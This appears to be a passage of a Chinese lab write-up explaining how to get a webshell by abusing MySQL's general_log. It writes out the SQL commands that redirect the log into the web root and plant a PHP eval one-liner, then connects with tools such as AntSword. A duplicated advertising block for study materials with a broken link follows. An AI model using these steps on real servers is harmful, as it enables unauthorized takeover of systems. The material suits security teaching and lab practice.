3、合理选择攻击机中的工具对目标Web进行扫描,收集信息,了解web服务器类型,查看是否有可疑端口、地址或文件。
4、根据可疑端口、地址或文件,设法找到网站数据库连接的地址和root密码。
用户名和密码均为root
5、以root权限登录网站数据库后,尝试利用日志文件来进行 getshell。首先在 sql 处执行“SHOW VARIABLES LIKE ‘general%’”查看是否开启日志功能以及日志文件的保存路径。
6、如日志功能暂未开启。可以执行“set global general_log = “ON”;”开启 mysql 日志功能,再次确认日志功能是否开启。
7、之后执行 sql 语句“select ‘<?php @eval($\_POST[1]);?>’”,向日志文件中写入 php 一句话木马。
8、但由于在linux中mysql数据库的日志与web目录的用户权限是分开的,我们此时还无法通过目录地址访问该日志文件。修改日志文件存储路径和文件名的语句为“set global general_log_file=’ 绝对路径’;”,寻找网站在服务器上的绝对地址(浏览可能包含该信息的文件)。
11、执行:“set global general_log_file=’ C://xxx//xxx//xxx//shell.php’;”将日志文件的存储路径改为站点根目录下的 shell.php 文件。
12、重新写入php一句话木马。
13、之后在浏览器中访问shell.php,查看是否能够访问成功。
14、使用webshell管理工具连接创建的shell.php文件,控制服务器。
菜刀、蚁剑
打开蚁剑,正确填入url低址和密码,进行测试连接
实验中遇到的问题
1.将日志文件的存储路径改为站点根目录下的 shell.php 文件
最后
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!
由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!
s.csdn.net/topics/618653875)
由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!